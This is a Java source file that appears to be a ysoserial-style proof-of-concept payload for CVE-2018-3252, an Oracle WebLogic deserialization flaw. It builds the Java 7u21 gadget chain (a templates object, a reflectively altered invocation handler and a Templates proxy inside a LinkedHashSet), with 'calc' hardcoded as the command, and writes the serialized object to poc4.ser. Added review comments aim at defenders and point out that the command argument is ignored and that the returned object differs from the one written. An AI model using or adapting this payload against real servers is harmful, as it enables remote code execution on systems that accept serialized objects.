PoC.java
package ysoserial.payloads;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import javax.xml.transform.Templates;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.LinkedHashSet;
import java.io.FileOutputStream;
import weblogic.common.internal.WLObjectOutputStream;
/**
 * ysoserial-style {@code ObjectPayload} named after CVE-2018-3252, an Oracle WebLogic
 * Server deserialization issue.
 *
 * <p>The object graph built here is a {@link LinkedHashSet} holding a templates object
 * and a dynamic {@link Templates} proxy whose {@link InvocationHandler} is backed by a
 * {@link HashMap}. It is serialized with WebLogic's {@code WLObjectOutputStream}.
 *
 * <p>Reviewer notes for defenders:
 * <ul>
 *   <li>{@link #isApplicableJavaVersion()} reports the graph as applicable only on
 *       Java below 7, or Java 7 up to update 21.</li>
 *   <li>The classes involved are the templates class, the handler class named by
 *       {@code Gadgets.ANN_INV_HANDLER_CLASS}, and a proxy. A deserialization
 *       allow-list (JEP 290 / {@code ObjectInputFilter}) can refuse them by name on
 *       endpoints that accept serialized objects.</li>
 * </ul>
 */
public class CVE_2018_3252 implements ObjectPayload<Object> {
/**
 * Builds the object graph and, as a side effect, writes it to {@code poc4.ser} in the
 * current working directory.
 *
 * <p>NOTE(review): {@code command} is never read; the literal {@code "calc"} is passed
 * to {@code Gadgets.createTemplatesImpl} instead.
 * NOTE(review): the value written to the file is the {@code LinkedHashSet}, but the
 * value returned is the {@code HashMap}. Confirm which one {@code PayloadRunner} is
 * meant to receive.
 *
 * @param command unused in this implementation
 * @return the {@code HashMap} that backs the proxy's invocation handler
 * @throws Exception if reflection, proxy creation or file output fails
 */
public Object getObject(String command) throws Exception {
// Helper is defined elsewhere in ysoserial; presumably returns a TemplatesImpl instance.
final Object templates = Gadgets.createTemplatesImpl("calc");
// Map key; per the original comment this string's hashCode() is zero.
String zeroHashCodeStr = "f5a5a608"; // hashcode of zero
// Backing map for the handler; it stays empty until after the set is populated below.
HashMap hashMap = new HashMap();
// Instantiate the handler reflectively through its first declared constructor,
// initially typed as Override.class with hashMap as its member-value map.
InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, hashMap);
// Overwrite the handler's "type" field so it describes Templates instead of Override.
Reflections.setFieldValue(tempHandler, "type", Templates.class);
// Dynamic proxy implementing Templates, dispatching to the handler above.
Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);
// LinkedHashSet keeps insertion order: templates first, then the proxy.
LinkedHashSet hashSet = new LinkedHashSet(); // maintain order
hashSet.add( templates );
hashSet.add( proxy );
// The map entry is added only after both elements are already in the set.
hashMap.put(zeroHashCodeStr, templates); // swap in real object
// Side effect: serialize the set to a fixed file name using WebLogic's stream class.
WLObjectOutputStream out = new WLObjectOutputStream(new FileOutputStream("poc4.ser"));
out.writeObject( hashSet );
// Returns the map, not the set that was written above.
return hashMap;
}
/**
 * Reports whether the local Java runtime falls in the range this payload targets.
 *
 * @return {@code true} when the local version is known and is either below major
 *         version 7, or major version 7 with update 21 or lower; {@code false} otherwise
 */
public static boolean isApplicableJavaVersion() {
JavaVersion v = JavaVersion.getLocalVersion();
// A null version (presumably undetectable) is treated as not applicable.
return v != null && (v.major < 7 || (v.major == 7 && v.update <= 21));
}
/**
 * Command-line entry point; delegates to {@code PayloadRunner.run} with this class.
 *
 * @param args command-line arguments forwarded unchanged to {@code PayloadRunner}
 * @throws Exception propagated from {@code PayloadRunner.run}
 */
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CVE_2018_3252.class, args);
}
}